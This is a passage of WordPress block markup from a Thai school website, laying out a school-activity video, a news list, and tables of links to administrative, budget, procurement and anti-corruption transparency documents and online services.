{\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/upl